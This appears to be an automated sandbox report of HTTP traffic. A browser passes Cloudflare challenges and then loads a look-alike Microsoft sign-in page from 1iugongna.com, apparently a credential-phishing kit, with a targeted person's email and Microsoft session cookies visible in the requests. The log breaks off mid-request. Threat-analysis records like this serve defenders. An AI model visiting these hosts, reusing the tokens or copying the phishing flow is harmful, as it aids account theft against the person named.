            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8fff7d524c468c95/1736541706065/35a236f1c8661b11e1fffc2bc8c9301701b2cbbc359ceafaac4bbcb309ba4b49/_ArrUB3Pi9YFLdw HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8sr4r/0x4AAAAAAA5A5S2_7yImhOJ-/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8fff7d524c468c95/1736541706063/t6T-xS85SQCUhhd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1267374137:1736539845:CrWD5AAFYEtqtUm0wbLWJ8rUW6pK4ln6I2Lp2JGR43Q/8fff7d524c468c95/AqAVM.prNMuy0uUMTpM5UtrhJs4VnecbRdjPdsh0LAU-1736541704-1.1.1.1-T20QuyMjqABcoklBq3Ltj2tjZqq22Q5zib_dbww6GA7bA.dw1eiZwMbExWZaN.zJ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1267374137:1736539845:CrWD5AAFYEtqtUm0wbLWJ8rUW6pK4ln6I2Lp2JGR43Q/8fff7d524c468c95/AqAVM.prNMuy0uUMTpM5UtrhJs4VnecbRdjPdsh0LAU-1736541704-1.1.1.1-T20QuyMjqABcoklBq3Ltj2tjZqq22Q5zib_dbww6GA7bA.dw1eiZwMbExWZaN.zJ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovLzFpdWdvbmduYS5jb20vIiwiZG9tYWluIjoiMWl1Z29uZ25hLmNvbSIsImtleSI6Im1pekZtN2x2aTRJeCIsInFyYyI6InJlY2liYXNlQHNlYW1hcml0aW1hLmNvbSIsImlhdCI6MTczNjU0MTcxNiwiZXhwIjoxNzM2NTQxODM2fQ.mg8KKqMk_b6jRb_kLR2AKWu0LYmXU6GtW6en6S22WT4 HTTP/1.1Host: 1iugongna.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://banirego.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /?auth=2&qrc=recibase%40seamaritima.com HTTP/1.1Host: 1iugongna.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://banirego.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_eaF-Fe71oZcWvr096r6xEw2.js HTTP/1.1Host: 1iugongna.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; fpc=AqmpK8D-cVJBmJZccveAQWM; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEIDY3wnU9tTHnxzNOpcNEc6oA8uwkN1wMKNWOdDoKhPkBEVBDfJwaaemIv2GkwD_DtB4mZDdXzLLA13XDlOvNA3B5upDzmzX3KvAir5ucCusO1wnhqM7exacuQzsou7dTWYxlYXQr8F9o4CFBHxembmeGbxutE_PxLw4v-t7Hd3AgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
            Source: global trafficHTTP traffic detected: GET /?auth=2&qrc=recibase%40seamaritima.com&sso_reload=true HTTP/1.1Host: 1iugongna.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; fpc=AqmpK8D-cVJBmJZccveAQWM; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEIDY3wnU9tTHnxzNOpcNEc6oA8uwkN1wMKNWOdDoKhPkBEVBDfJwaaemIv2GkwD_DtB4mZDdXzLLA13XDlOvNA3B5upDzmzX3KvAir5ucCusO1wnhqM7exacuQzsou7dTWYxlYXQr8F9o4CFBHxembmeGbxutE_PxLw4v-t7Hd3AgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 1iugongna.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; fpc=AqmpK8D-cVJBmJZccveAQWM; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEIDY3wnU9tTHnxzNOpcNEc6oA8uwkN1wMKNWOdDoKhPkBEVBDfJwaaemIv2GkwD_DtB4mZDdXzLLA13XDlOvNA3B5upDzmzX3KvAir5ucCusO1wnhqM7exacuQzsou7dTWYxlYXQr8F9o4CFBHxembmeGbxutE_PxLw4v-t7Hd3AgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_eaF-Fe71oZcWvr096r6xEw2.js HTTP/1.1Host: 1iugongna.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; fpc=AqmpK8D-cVJBmJZccveAQWM; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEIDY3wnU9tTHnxzNOpcNEc6oA8uwkN1wMKNWOdDoKhPkBEVBDfJwaaemIv2GkwD_DtB4mZDdXzLLA13XDlOvNA3B5upDzmzX3KvAir5ucCusO1wnhqM7exacuQzsou7dTWYxlYXQr8F9o4CFBHxembmeGbxutE_PxLw4v-t7Hd3AgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css HTTP/1.1Host: 1iugongna.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_kAx9qZOSH4g90FNHstHMCA2.js HTTP/1.1Host: 1iugongna.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js HTTP/1.1Host: 1iugongna.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js HTTP/1.1Host: 1iugongna.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/oneDs_641b1cf809bdc17b42ab.js HTTP/1.1Host: 1iugongna.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_kAx9qZOSH4g90FNHstHMCA2.js HTTP/1.1Host: 1iugongna.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_ae573f441ee1cf781ec7.js HTTP/1.1Host: 1iugongna.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; 